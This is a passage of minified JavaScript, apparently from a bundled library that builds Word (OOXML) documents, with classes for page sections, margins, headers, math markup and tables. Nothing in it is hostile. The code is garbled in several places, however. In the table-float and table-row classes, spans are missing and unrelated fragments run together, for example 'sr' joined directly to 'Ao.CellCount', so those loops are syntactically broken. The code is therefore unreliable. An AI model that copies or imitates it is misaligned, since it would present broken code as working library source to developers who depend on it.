He]})}}!function(Se){Se.BOTTOM="bottom",Se.CENTER="center",Se.TOP="top"}(pn||(pn={}));class Un extends b{constructor(){super(...arguments),this.xmlKeys={verticalAlign:"w:val"}}}class ur extends E{constructor(Ce){super("w:vAlign"),this.root.push(new Un({verticalAlign:Ce}))}}!function(Se){Se.DEFAULT="default",Se.FIRST="first",Se.EVEN="even"}(Pt||(Pt={}));class tn extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"r:id"}}}!function(Se){Se.HEADER="w:headerReference",Se.FOOTER="w:footerReference"}(Xt||(Xt={}));class zl extends E{constructor(Ce,nt){super(Ce),this.root.push(new tn({type:nt.type||Pt.DEFAULT,id:`rId${nt.id}`}))}}class ds extends b{constructor(){super(...arguments),this.xmlKeys={space:"w:space",count:"w:num",separate:"w:sep",equalWidth:"w:equalWidth"}}}class Bm extends E{constructor({space:Ce,count:nt,separate:Dt,equalWidth:di,children:pi}){super("w:cols"),this.root.push(new ds({space:void 0===Ce?void 0:(0,z.Jd)(Ce),count:void 0===nt?void 0:(0,z.vH)(nt),separate:Dt,equalWidth:di})),!di&&pi&&pi.forEach(Hi=>this.addChildElement(Hi))}}!function(Se){Se.DEFAULT="default",Se.LINES="lines",Se.LINES_AND_CHARS="linesAndChars",Se.SNAP_TO_CHARS="snapToChars"}(Ho||(Ho={}));class Wl extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",linePitch:"w:linePitch",charSpace:"w:charSpace"}}}class xs extends E{constructor(Ce,nt,Dt){super("w:docGrid"),this.root.push(new Wl({type:Dt,linePitch:(0,z.vH)(Ce),charSpace:nt?(0,z.vH)(nt):void 0}))}}!function(Se){Se.NEW_PAGE="newPage",Se.NEW_SECTION="newSection",Se.CONTINUOUS="continuous"}(Qt||(Qt={}));class qu extends b{constructor(){super(...arguments),this.xmlKeys={countBy:"w:countBy",start:"w:start",restart:"w:restart",distance:"w:distance"}}}class ws extends E{constructor({countBy:Ce,start:nt,restart:Dt,distance:di}){super("w:lnNumType"),this.root.push(new qu({countBy:void 0===Ce?void 0:(0,z.vH)(Ce),start:void 0===nt?void 0:(0,z.vH)(nt),restart:Dt,distance:void 0===di?void 0:(0,z.Jd)(di)}))}}(function(Se){Se.ALL_PAGES="allPages",Se.FIRST_PAGE="firstPage",Se.NOT_FIRST_PAGE="notFirstPage"})(ei||(ei={})),function(Se){Se.PAGE="page",Se.TEXT="text"}($o||($o={})),function(Se){Se.BACK="back",Se.FRONT="front"}(ai||(ai={}));class In extends b{constructor(){super(...arguments),this.xmlKeys={display:"w:display",offsetFrom:"w:offsetFrom",zOrder:"w:zOrder"}}}class a_ extends C{constructor(Ce){super("w:pgBorders"),Ce&&(this.root.push(new In(Ce.pageBorders?{display:Ce.pageBorders.display,offsetFrom:Ce.pageBorders.offsetFrom,zOrder:Ce.pageBorders.zOrder}:{})),Ce.pageBorderTop&&this.root.push(new L("w:top",Ce.pageBorderTop)),Ce.pageBorderLeft&&this.root.push(new L("w:left",Ce.pageBorderLeft)),Ce.pageBorderBottom&&this.root.push(new L("w:bottom",Ce.pageBorderBottom)),Ce.pageBorderRight&&this.root.push(new L("w:right",Ce.pageBorderRight)))}}class xo extends b{constructor(){super(...arguments),this.xmlKeys={top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter"}}}class Vi extends E{constructor(Ce,nt,Dt,di,pi,Hi,_a){super("w:pgMar"),this.root.push(new xo({top:(0,z.xb)(Ce),right:(0,z.Jd)(nt),bottom:(0,z.xb)(Dt),left:(0,z.Jd)(di),header:(0,z.Jd)(pi),footer:(0,z.Jd)(Hi),gutter:(0,z.Jd)(_a)}))}}!function(Se){Se.HYPHEN="hyphen",Se.PERIOD="period",Se.COLON="colon",Se.EM_DASH="emDash",Se.EN_DASH="endash"}($t||($t={}));class Ia extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",formatType:"w:fmt",separator:"w:chapSep"}}}class wo extends E{constructor({start:Ce,formatType:nt,separator:Dt}){super("w:pgNumType"),this.root.push(new Ia({start:void 0===Ce?void 0:(0,z.vH)(Ce),formatType:nt,separator:Dt}))}}!function(Se){Se.PORTRAIT="portrait",Se.LANDSCAPE="landscape"}(zo||(zo={}));class _n extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",height:"w:h",orientation:"w:orient"}}}class Fl extends E{constructor(Ce,nt,Dt){super("w:pgSz");const di=Dt===zo.LANDSCAPE,pi=(0,z.Jd)(Ce),Hi=(0,z.Jd)(nt);this.root.push(new _n({width:di?Hi:pi,height:di?pi:Hi,orientation:Dt}))}}!function(Se){Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Ut||(Ut={}));class Rr extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Vl extends E{constructor(Ce){super("w:textDirection"),this.root.push(new Rr({val:Ce}))}}!function(Se){Se.NEXT_PAGE="nextPage",Se.NEXT_COLUMN="nextColumn",Se.CONTINUOUS="continuous",Se.EVEN_PAGE="evenPage",Se.ODD_PAGE="oddPage"}(Yt||(Yt={}));class er extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Bl extends E{constructor(Ce){super("w:type"),this.root.push(new er({val:Ce}))}}const tc={TOP:"1in",RIGHT:"1in",BOTTOM:"1in",LEFT:"1in",HEADER:708,FOOTER:708,GUTTER:0},$a={WIDTH:11906,HEIGHT:16838,ORIENTATION:zo.PORTRAIT};class ms extends E{constructor({page:{size:{width:Ce=$a.WIDTH,height:nt=$a.HEIGHT,orientation:Dt=$a.ORIENTATION}={},margin:{top:di=tc.TOP,right:pi=tc.RIGHT,bottom:Hi=tc.BOTTOM,left:_a=tc.LEFT,header:Ya=tc.HEADER,footer:ca=tc.FOOTER,gutter:ka=tc.GUTTER}={},pageNumbers:Dr={},borders:Ao,textDirection:sr}={},grid:{linePitch:Fc=360,charSpace:At,type:gc}={},headerWrapperGroup:Po={},footerWrapperGroup:Vf={},lineNumbers:eu,titlePage:dh,verticalAlign:mh,column:z_,type:uh}={}){super("w:sectPr"),this.addHeaderFooterGroup(Xt.HEADER,Po),this.addHeaderFooterGroup(Xt.FOOTER,Vf),uh&&this.root.push(new Bl(uh)),this.root.push(new Fl(Ce,nt,Dt)),this.root.push(new Vi(di,pi,Hi,_a,Ya,ca,ka)),Ao&&this.root.push(new a_(Ao)),eu&&this.root.push(new ws(eu)),this.root.push(new wo(Dr)),z_&&this.root.push(new Bm(z_)),mh&&this.root.push(new ur(mh)),void 0!==dh&&this.root.push(new l("w:titlePg",dh)),sr&&this.root.push(new Vl(sr)),this.root.push(new xs(Fc,At,gc))}addHeaderFooterGroup(Ce,nt){nt.default&&this.root.push(new zl(Ce,{type:Pt.DEFAULT,id:nt.default.View.ReferenceId})),nt.first&&this.root.push(new zl(Ce,{type:Pt.FIRST,id:nt.first.View.ReferenceId})),nt.even&&this.root.push(new zl(Ce,{type:Pt.EVEN,id:nt.even.View.ReferenceId}))}}class Hs extends E{constructor(){super("w:body"),this.sections=[]}addSection(Ce){const nt=this.sections.pop();this.root.push(this.createSectionParagraph(nt)),this.sections.push(new ms(Ce))}prepForXml(Ce){return 1===this.sections.length&&(this.root.splice(0,1),this.root.push(this.sections.pop())),super.prepForXml(Ce)}push(Ce){this.root.push(Ce)}createSectionParagraph(Ce){const nt=new uc({}),Dt=new dl({});return Dt.push(Ce),nt.addChildElement(Dt),nt}}class Oc extends b{constructor(){super(...arguments),this.xmlKeys={width:"w:w",space:"w:space"}}}class tr extends E{constructor({width:Ce,space:nt}){super("w:col"),this.root.push(new Oc({width:(0,z.Jd)(Ce),space:void 0===nt?void 0:(0,z.Jd)(nt)}))}}class ko extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type",cx:"xmlns:cx",cx1:"xmlns:cx1",cx2:"xmlns:cx2",cx3:"xmlns:cx3",cx4:"xmlns:cx4",cx5:"xmlns:cx5",cx6:"xmlns:cx6",cx7:"xmlns:cx7",cx8:"xmlns:cx8",aink:"xmlns:aink",am3d:"xmlns:am3d",w16cex:"xmlns:w16cex",w16cid:"xmlns:w16cid",w16:"xmlns:w16",w16sdtdh:"xmlns:w16sdtdh",w16se:"xmlns:w16se"}}}class Gd extends b{constructor(){super(...arguments),this.xmlKeys={color:"w:color",themeColor:"w:themeColor",themeShade:"w:themeShade",themeTint:"w:themeTint"}}}class rd extends E{constructor(Ce){super("w:background"),this.root.push(new Gd({color:void 0===Ce.color?void 0:(0,z.dg)(Ce.color),themeColor:Ce.themeColor,themeShade:void 0===Ce.themeShade?void 0:(0,z.xD)(Ce.themeShade),themeTint:void 0===Ce.themeTint?void 0:(0,z.xD)(Ce.themeTint)}))}}class ic extends E{constructor(Ce){super("w:document"),this.root.push(new ko({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",cx:"http://schemas.microsoft.com/office/drawing/2014/chartex",cx1:"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex",cx2:"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex",cx3:"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex",cx4:"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex",cx5:"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex",cx6:"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex",cx7:"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex",cx8:"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex",aink:"http://schemas.microsoft.com/office/drawing/2016/ink",am3d:"http://schemas.microsoft.com/office/drawing/2017/model3d",w16cex:"http://schemas.microsoft.com/office/word/2018/wordml/cex",w16cid:"http://schemas.microsoft.com/office/word/2016/wordml/cid",w16:"http://schemas.microsoft.com/office/word/2018/wordml",w16sdtdh:"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash",w16se:"http://schemas.microsoft.com/office/word/2015/wordml/symex",Ignorable:"w14 w15 wp14"})),this.body=new Hs,this.root.push(new rd(Ce.background)),this.root.push(this.body)}add(Ce){return this.body.push(Ce),this}get Body(){return this.body}}class jd extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Hm extends E{constructor(){super("Relationships"),this.root.push(new jd({xmlns:"http://schemas.openxmlformats.org/package/2006/relationships"}))}addRelationship(Ce){this.root.push(Ce)}createRelationship(Ce,nt,Dt,di){const pi=new n0(`rId${Ce}`,nt,Dt,di);return this.addRelationship(pi),pi}get RelationshipCount(){return this.root.length-1}}class uo{constructor(Ce){this.document=new ic(Ce),this.relationships=new Hm}get View(){return this.document}get Relationships(){return this.relationships}}var Nc,n_,us;(function(Se){Se.NONE="none",Se.DROP="drop",Se.MARGIN="margin"})(Nc||(Nc={})),function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"}(n_||(n_={})),function(Se){Se.AROUND="around",Se.AUTO="auto",Se.NONE="none",Se.NOT_BESIDE="notBeside",Se.THROUGH="through",Se.TIGHT="tight"}(us||(us={}));class Is extends b{constructor(){super(...arguments),this.xmlKeys={anchorLock:"w:anchorLock",dropCap:"w:dropCap",width:"w:w",height:"w:h",x:"w:x",y:"w:y",anchorHorizontal:"w:hAnchor",anchorVertical:"w:vAnchor",spaceHorizontal:"w:hSpace",spaceVertical:"w:vSpace",rule:"w:hRule",alignmentX:"w:xAlign",alignmentY:"w:yAlign",lines:"w:lines",wrap:"w:wrap"}}}class Gu extends E{constructor(Ce){var nt,Dt;super("w:framePr"),this.root.push(new Is({anchorLock:Ce.anchorLock,dropCap:Ce.dropCap,width:Ce.width,height:Ce.height,x:Ce.position?Ce.position.x:void 0,y:Ce.position?Ce.position.y:void 0,anchorHorizontal:Ce.anchor.horizontal,anchorVertical:Ce.anchor.vertical,spaceHorizontal:null===(nt=Ce.space)||void 0===nt?void 0:nt.horizontal,spaceVertical:null===(Dt=Ce.space)||void 0===Dt?void 0:Dt.vertical,rule:Ce.rule,alignmentX:Ce.alignment?Ce.alignment.x:void 0,alignmentY:Ce.alignment?Ce.alignment.y:void 0,lines:Ce.lines,wrap:Ce.wrap}))}}class dl extends C{constructor(Ce){var nt,Dt;if(super("w:pPr"),this.numberingReferences=[],!Ce)return this;if(Ce.heading&&this.push(new vo(Ce.heading)),Ce.bullet&&this.push(new vo("ListParagraph")),Ce.numbering&&(Ce.style||Ce.heading||Ce.numbering.custom||this.push(new vo("ListParagraph"))),Ce.style&&this.push(new vo(Ce.style)),void 0!==Ce.keepNext&&this.push(new l("w:keepNext",Ce.keepNext)),void 0!==Ce.keepLines&&this.push(new l("w:keepLines",Ce.keepLines)),Ce.pageBreakBefore&&this.push(new V2),Ce.frame&&this.push(new Gu(Ce.frame)),void 0!==Ce.widowControl&&this.push(new l("w:widowControl",Ce.widowControl)),Ce.bullet&&this.push(new Xn(1,Ce.bullet.level)),Ce.numbering&&(this.numberingReferences.push({reference:Ce.numbering.reference,instance:null!==(nt=Ce.numbering.instance)&&void 0!==nt?nt:0}),this.push(new Xn(`${Ce.numbering.reference}-${null!==(Dt=Ce.numbering.instance)&&void 0!==Dt?Dt:0}`,Ce.numbering.level))),Ce.border&&this.push(new R(Ce.border)),Ce.thematicBreak&&this.push(new J),Ce.shading&&this.push(new me(Ce.shading)),Ce.rightTabStop&&this.push(new Zp(Kt.RIGHT,Ce.rightTabStop)),Ce.tabStops)for(const di of Ce.tabStops)this.push(new Zp(di.type,di.position,di.leader));Ce.leftTabStop&&this.push(new Zp(Kt.LEFT,Ce.leftTabStop)),void 0!==Ce.bidirectional&&this.push(new l("w:bidi",Ce.bidirectional)),Ce.spacing&&this.push(new dc(Ce.spacing)),Ce.indent&&this.push(new ue(Ce.indent)),void 0!==Ce.contextualSpacing&&this.push(new l("w:contextualSpacing",Ce.contextualSpacing)),Ce.alignment&&this.push(new X(Ce.alignment)),void 0!==Ce.outlineLevel&&this.push(new Uu(Ce.outlineLevel)),void 0!==Ce.suppressLineNumbers&&this.push(new l("w:suppressLineNumbers",Ce.suppressLineNumbers))}push(Ce){this.root.push(Ce)}prepForXml(Ce){if(Ce.viewWrapper instanceof uo)for(const nt of this.numberingReferences)Ce.file.Numbering.createConcreteNumberingInstance(nt.reference,nt.instance);return super.prepForXml(Ce)}}class uc extends E{constructor(Ce){if(super("w:p"),"string"==typeof Ce)return this.properties=new dl({}),this.root.push(this.properties),this.root.push(new vt(Ce)),this;if(this.properties=new dl(Ce),this.root.push(this.properties),Ce.text&&this.root.push(new vt(Ce.text)),Ce.children)for(const nt of Ce.children)if(nt instanceof i_){this.root.push(nt.start);for(const Dt of nt.children)this.root.push(Dt);this.root.push(nt.end)}else this.root.push(nt)}prepForXml(Ce){for(const nt of this.root)if(nt instanceof Wt){const Dt=this.root.indexOf(nt),di=new qd(nt.options.children,(0,ha.EL)());Ce.viewWrapper.Relationships.createRelationship(di.linkId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",nt.options.link,ti.EXTERNAL),this.root[Dt]=di}return super.prepForXml(Ce)}addRunToFront(Ce){return this.root.splice(1,0,Ce),this}}class gr extends E{constructor(Ce){super("m:oMath");for(const nt of Ce.children)this.root.push(nt)}}class s0 extends E{constructor(Ce){super("m:t"),this.root.push(Ce)}}class PM extends E{constructor(Ce){super("m:r"),this.root.push(new s0(Ce))}}class c0 extends E{constructor(Ce){super("m:den");for(const nt of Ce)this.root.push(nt)}}class ju extends E{constructor(Ce){super("m:num");for(const nt of Ce)this.root.push(nt)}}class OM extends E{constructor(Ce){super("m:f"),this.root.push(new ju(Ce.numerator)),this.root.push(new c0(Ce.denominator))}}class U2 extends b{constructor(){super(...arguments),this.xmlKeys={accent:"m:val"}}}class l0 extends E{constructor(Ce){super("m:chr"),this.root.push(new U2({accent:Ce}))}}class hc extends E{constructor(Ce){super("m:e");for(const nt of Ce)this.root.push(nt)}}class q2 extends b{constructor(){super(...arguments),this.xmlKeys={value:"m:val"}}}class d0 extends E{constructor(){super("m:limLoc"),this.root.push(new q2({value:"undOvr"}))}}class G2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class j2 extends E{constructor(){super("m:subHide"),this.root.push(new G2({hide:1}))}}class Q2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class NM extends E{constructor(){super("m:supHide"),this.root.push(new Q2({hide:1}))}}class Tf extends E{constructor(Ce,nt,Dt){super("m:naryPr"),this.root.push(new l0(Ce)),this.root.push(new d0),nt||this.root.push(new NM),Dt||this.root.push(new j2)}}class Ef extends E{constructor(Ce){super("m:sub");for(const nt of Ce)this.root.push(nt)}}class Df extends E{constructor(Ce){super("m:sup");for(const nt of Ce)this.root.push(nt)}}class m0 extends E{constructor(Ce){super("m:nary"),this.root.push(new Tf("\u2211",!!Ce.superScript,!!Ce.subScript)),Ce.subScript&&this.root.push(new Ef(Ce.subScript)),Ce.superScript&&this.root.push(new Df(Ce.superScript)),this.root.push(new hc(Ce.children))}}class o_ extends E{constructor(){super("m:sSupPr")}}class xf extends E{constructor(Ce){super("m:sSup"),this.root.push(new o_),this.root.push(new hc(Ce.children)),this.root.push(new Df(Ce.superScript))}}class $2 extends E{constructor(){super("m:sSubPr")}}class LM extends E{constructor(Ce){super("m:sSub"),this.root.push(new $2),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript))}}class K2 extends E{constructor(){super("m:sSubSupPr")}}class Qd extends E{constructor(Ce){super("m:sSubSup"),this.root.push(new K2),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript)),this.root.push(new Df(Ce.superScript))}}class u0 extends E{constructor(){super("m:sPrePr")}}class sa extends E{constructor(Ce){super("m:sPre"),this.root.push(new u0),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript)),this.root.push(new Df(Ce.superScript))}}const h0="";class f0 extends E{constructor(Ce){if(super("m:deg"),Ce)for(const nt of Ce)this.root.push(nt)}}class wf extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class p0 extends E{constructor(){super("m:degHide"),this.root.push(new wf({hide:1}))}}class r_ extends E{constructor(Ce){super("m:radPr"),Ce||this.root.push(new p0)}}class X2 extends E{constructor(Ce){super("m:rad"),this.root.push(new r_(!!Ce.degree)),this.root.push(new f0(Ce.degree)),this.root.push(new hc(Ce.children))}}class If extends E{constructor(Ce){super("m:fName");for(const nt of Ce)this.root.push(nt)}}class Qu extends E{constructor(){super("m:funcPr")}}class fc extends E{constructor(Ce){super("m:func"),this.root.push(new Qu),this.root.push(new If(Ce.name)),this.root.push(new hc(Ce.children))}}class s_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Y2 extends E{constructor(Ce){super("m:begChr"),this.root.push(new s_({character:Ce}))}}class c_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Rf extends E{constructor(Ce){super("m:endChr"),this.root.push(new c_({character:Ce}))}}class l_ extends E{constructor(Ce){super("m:dPr"),Ce&&(this.root.push(new Y2(Ce.beginningCharacter)),this.root.push(new Rf(Ce.endingCharacter)))}}class Ar extends E{constructor(Ce){super("m:d"),this.root.push(new l_),this.root.push(new hc(Ce.children))}}class J2 extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"[",endingCharacter:"]"})),this.root.push(new hc(Ce.children))}}class zM extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"{",endingCharacter:"}"})),this.root.push(new hc(Ce.children))}}class $d extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"\u2329",endingCharacter:"\u232a"})),this.root.push(new hc(Ce.children))}}class pc extends E{constructor(Ce){super("w:tblGrid");for(const nt of Ce)this.root.push(new d_(nt))}}class Z2 extends b{constructor(){super(...arguments),this.xmlKeys={w:"w:w"}}}class d_ extends E{constructor(Ce){super("w:gridCol"),void 0!==Ce&&this.root.push(new Z2({w:(0,z.Jd)(Ce)}))}}var Lc,hs,$u,Um;!function(Se){Se.AUTO="auto",Se.DXA="dxa",Se.NIL="nil",Se.PERCENTAGE="pct"}(Lc||(Lc={}));class eC extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",size:"w:w"}}}class Rs extends E{constructor(Ce,{type:nt=Lc.AUTO,size:Dt}){super(Ce);let di=Dt;nt===Lc.PERCENTAGE&&"number"==typeof Dt&&(di=`${Dt}%`),this.root.push(new eC({type:nt,size:(0,z.aB)(di)}))}}!function(Se){Se.TABLE="w:tblCellMar",Se.TABLE_CELL="w:tcMar"}(hs||(hs={}));class m_ extends C{constructor(Ce,{marginUnitType:nt=Lc.DXA,top:Dt,left:di,bottom:pi,right:Hi}){super(Ce),void 0!==Dt&&this.root.push(new Rs("w:top",{type:nt,size:Dt})),void 0!==di&&this.root.push(new Rs("w:left",{type:nt,size:di})),void 0!==pi&&this.root.push(new Rs("w:bottom",{type:nt,size:pi})),void 0!==Hi&&this.root.push(new Rs("w:right",{type:nt,size:Hi}))}}class sd extends C{constructor(Ce){super("w:tcBorders"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.start&&this.root.push(new L("w:start",Ce.start)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.end&&this.root.push(new L("w:end",Ce.end)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class Ua extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class u_ extends E{constructor(Ce){super("w:gridSpan"),this.root.push(new Ua({val:(0,z.vH)(Ce)}))}}!function(Se){Se.CONTINUE="continue",Se.RESTART="restart"}($u||($u={}));class tC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class h_ extends E{constructor(Ce){super("w:vMerge"),this.root.push(new tC({val:Ce}))}}!function(Se){Se.BOTTOM_TO_TOP_LEFT_TO_RIGHT="btLr",Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Um||(Um={}));class iC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Sf extends E{constructor(Ce){super("w:textDirection"),this.root.push(new iC({val:Ce}))}}class Ku extends C{constructor(Ce){super("w:tcPr"),Ce.width&&this.root.push(new Rs("w:tcW",Ce.width)),Ce.columnSpan&&this.root.push(new u_(Ce.columnSpan)),Ce.verticalMerge?this.root.push(new h_(Ce.verticalMerge)):Ce.rowSpan&&Ce.rowSpan>1&&this.root.push(new h_($u.RESTART)),Ce.borders&&this.root.push(new sd(Ce.borders)),Ce.shading&&this.root.push(new me(Ce.shading)),Ce.margins&&this.root.push(new m_(hs.TABLE_CELL,Ce.margins)),Ce.textDirection&&this.root.push(new Sf(Ce.textDirection)),Ce.verticalAlign&&this.root.push(new ur(Ce.verticalAlign))}}class f_ extends E{constructor(Ce){super("w:tc"),this.options=Ce,this.root.push(new Ku(Ce));for(const nt of Ce.children)this.root.push(nt)}prepForXml(Ce){return this.root[this.root.length-1]instanceof uc||this.root.push(new uc({})),super.prepForXml(Ce)}}const qm={style:B.NONE,size:0,color:"auto"},bi={style:B.SINGLE,size:4,color:"auto"};class Rn extends E{constructor(Ce){super("w:tblBorders"),this.root.push(new L("w:top",Ce.top?Ce.top:bi)),this.root.push(new L("w:left",Ce.left?Ce.left:bi)),this.root.push(new L("w:bottom",Ce.bottom?Ce.bottom:bi)),this.root.push(new L("w:right",Ce.right?Ce.right:bi)),this.root.push(new L("w:insideH",Ce.insideHorizontal?Ce.insideHorizontal:bi)),this.root.push(new L("w:insideV",Ce.insideVertical?Ce.insideVertical:bi))}}var be,kf,Kd,_c,Xu,Yu,p_;Rn.NONE={top:qm,bottom:qm,left:qm,right:qm,insideHorizontal:qm,insideVertical:qm},function(Se){Se.NEVER="never",Se.OVERLAP="overlap"}(be||(be={}));class Me extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class or extends E{constructor(Ce){super("w:tblOverlap"),this.root.push(new Me({val:Ce}))}}(function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"})(kf||(kf={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.LEFT="left",Se.OUTSIDE="outside",Se.RIGHT="right"}(Kd||(Kd={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.BOTTOM="bottom",Se.OUTSIDE="outside",Se.INLINE="inline",Se.TOP="top"}(_c||(_c={}));class _0 extends b{constructor(){super(...arguments),this.xmlKeys={horizontalAnchor:"w:horzAnchor",verticalAnchor:"w:vertAnchor",absoluteHorizontalPosition:"w:tblpX",relativeHorizontalPosition:"w:tblpXSpec",absoluteVerticalPosition:"w:tblpY",relativeVerticalPosition:"w:tblpYSpec",bottomFromText:"w:bottomFromText",topFromText:"w:topFromText",leftFromText:"w:leftFromText",rightFromText:"w:rightFromText"}}}class aC extends E{constructor(Ce){var{leftFromText:nt,rightFromText:Dt,topFromText:di,bottomFromText:pi,absoluteHorizontalPosition:Hi,absoluteVerticalPosition:_a}=Ce,Ya=function(ca,ka){var Dr={};for(var Ao in ca)Object.prototype.hasOwnProperty.call(ca,Ao)&&ka.indexOf(Ao)<0&&(Dr[Ao]=ca[Ao]);if(null!=ca&&"function"==typeof Object.getOwnPropertySymbols){var sr=0;for(Ao=Object.getOwnPropertySymbols(ca);srAo.CellCount))).fill(100),margins:di,indent:pi,float:Hi,layout:_a,style:Ya,borders:ca,alignment:ka,visuallyRightToLeft:Dr}){super("w:tbl"),this.root.push(new ml({borders:null!=ca?ca:{},width:null!=nt?nt:{size:100},indent:pi,float:Hi,layout:_a,style:Ya,alignment:ka,cellMargin:di,visuallyRightToLeft:Dr})),this.root.push(new pc(Dt));for(const Ao of Ce)this.root.push(Ao);Ce.forEach((Ao,sr)=>{if(sr===Ce.length-1)return;let Fc=0;Ao.cells.forEach(At=>{if(At.options.rowSpan&&At.options.rowSpan>1){const gc=new f_({rowSpan:At.options.rowSpan-1,columnSpan:At.options.columnSpan,borders:At.options.borders,children:[],verticalMerge:$u.CONTINUE});Ce[sr+1].addCellToColumnIndex(gc,Fc)}Fc+=At.options.columnSpan||1})})}}!function(Se){Se.AUTO="auto",Se.ATLEAST="atLeast",Se.EXACT="exact"}(Yu||(Yu={}));class cd extends b{constructor(){super(...arguments),this.xmlKeys={value:"w:val",rule:"w:hRule"}}}class ul extends E{constructor(Ce,nt){super("w:trHeight"),this.root.push(new cd({value:(0,z.Jd)(Ce),rule:nt}))}}class y0 extends C{constructor(Ce){super("w:trPr"),void 0!==Ce.cantSplit&&this.root.push(new l("w:cantSplit",Ce.cantSplit)),void 0!==Ce.tableHeader&&this.root.push(new l("w:tblHeader",Ce.tableHeader)),Ce.height&&this.root.push(new ul(Ce.height.value,Ce.height.rule))}}class b0 extends E{constructor(Ce){super("w:tr"),this.options=Ce,this.root.push(new y0(Ce));for(const nt of Ce.children)this.root.push(nt)}get CellCount(){return this.options.children.length}get cells(){return this.root.filter(Ce=>Ce instanceof f_)}addCellToIndex(Ce,nt){this.root.splice(nt+1,0,Ce)}addCellToColumnIndex(Ce,nt){const Dt=this.columnIndexToRootIndex(nt,!0);this.addCellToIndex(Ce,Dt-1)}rootIndexToColumnIndex(Ce){if(Ce<1||Ce>=this.root.length)throw new Error("cell 'rootIndex' should between 1 to "+(this.root.length-1));let nt=0;for(let Dt=1;Dt=this.root.length){if(nt)return this.root.length;throw new Error("cell 'columnIndex' should not great than "+(Dt-1))}const pi=this.root[di];di+=1,Dt+=pi&&pi.options.columnSpan||1}return di-1}}class Gm extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class nC extends E{constructor(){super("Properties"),this.root.push(new Gm({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"}))}}class __ extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Pf extends b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",extension:"Extension"}}}class ld extends E{constructor(Ce,nt){super("Default"),this.root.push(new Pf({contentType:Ce,extension:nt}))}}class g_ extends 